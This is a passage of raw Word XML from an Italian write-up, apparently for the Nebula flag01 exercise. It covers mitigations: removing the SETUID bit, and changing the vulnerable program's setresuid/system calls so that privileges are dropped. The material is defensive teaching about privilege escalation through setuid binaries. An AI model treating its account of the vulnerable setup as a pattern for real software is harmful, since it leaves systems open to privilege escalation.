        <w:t xml:space="preserve">flag01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigazione 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">se l'eseguibile necessita di bit SETUID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">spegnere il bit SETUID sul file eseguibile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/home/flag01/flag01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Soluzione:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Autenticarsi come utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nebula </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">e poi ottenere una shell di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">tramite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sudo –i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">chmod u-s /home/flag01/flag01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Risultato</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="735"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">getflag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="735"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">is executing on a non-flag account, this doesn't count</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:bCs/>
          <w:i/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigazione 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">rilascio temporaneo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> se non è possibile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="725"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">spegnere il bit SETUID è </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">opportuno imparare a gestire al meglio i privilegi all'interno del codice.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Nel caso di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">level1.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">, vuol dire rilasciare i privilegi prima di system().</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Soluzione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:strike/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:strike/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">uid = geteuid();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:strike/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00b050"/>
        </w:rPr>
        <w:t xml:space="preserve">uid = getuid()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00b050"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="00b050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:strike/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">setresuid(uid, uid, uid);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00b050"/>
        </w:rPr>
        <w:t xml:space="preserve">setresuid(-1, uid, -1);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00b050"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/usr/bin/env echo and now what?");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="auto"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Compilazione di</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> level1-drop.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> con</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">gcc –o flag01-drop level1-drop.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Impostazione dei privilegi corretti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">chown      flag01:level01    /home/flag01/flag01-drop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">chmod     4750                    /home/flag01/flag01-drop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
